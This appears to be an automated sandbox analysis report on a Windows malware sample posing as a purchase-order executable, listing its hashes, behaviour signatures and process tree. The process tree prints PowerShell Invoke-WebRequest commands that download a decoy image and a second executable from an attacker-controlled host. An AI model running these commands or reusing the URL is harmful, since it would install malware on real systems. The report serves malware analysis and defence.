Analysis
-
max time kernel
122s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
30-07-2024 02:36
Static task
static1
Behavioral task
behavioral1
Sample
jdconstructnOrderfdp..exe
Resource
win7-20240705-en
General
-
Target
jdconstructnOrderfdp..exe
-
Size
288KB
-
MD5
7e900eb50f9dc1cb5c68ffea4b9e7bcc
-
SHA1
4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
-
SHA256
8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
-
SHA512
a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
-
SSDEEP
3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepid process 2660 powershell.exe 2332 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
jdconstructnOrderfdp..exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jdconstructnOrderfdp..exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2660 powershell.exe 2332 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2660 powershell.exe Token: SeDebugPrivilege 2332 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
jdconstructnOrderfdp..execmd.exedescription pid process target process PID 2700 wrote to memory of 1376 2700 jdconstructnOrderfdp..exe cmd.exe PID 2700 wrote to memory of 1376 2700 jdconstructnOrderfdp..exe cmd.exe PID 2700 wrote to memory of 1376 2700 jdconstructnOrderfdp..exe cmd.exe PID 2700 wrote to memory of 1376 2700 jdconstructnOrderfdp..exe cmd.exe PID 1376 wrote to memory of 2660 1376 cmd.exe powershell.exe PID 1376 wrote to memory of 2660 1376 cmd.exe powershell.exe PID 1376 wrote to memory of 2660 1376 cmd.exe powershell.exe PID 1376 wrote to memory of 2332 1376 cmd.exe powershell.exe PID 1376 wrote to memory of 2332 1376 cmd.exe powershell.exe PID 1376 wrote to memory of 2332 1376 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\338E.tmp\338F.tmp\3390.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
334B
MD59aaac0122442ca0ebb4d8bb795e86676
SHA1594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA2566af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b310916d9f3f5fb99bb03ca1fc8a1d07
SHA15ff09f5fa270422f54de0827799bccdc28cbdff4
SHA256665df35895f7174811a9d4c87a756924ed2eb1749575de0e25d85be00c905ae0
SHA5126889b550877ed6928fcb7106d4de4ae5a5445e2995767b6676452f300046c403283d21570efbcdfe455088a4c01d049bc2253287064e2c828e3700d3b0b34da5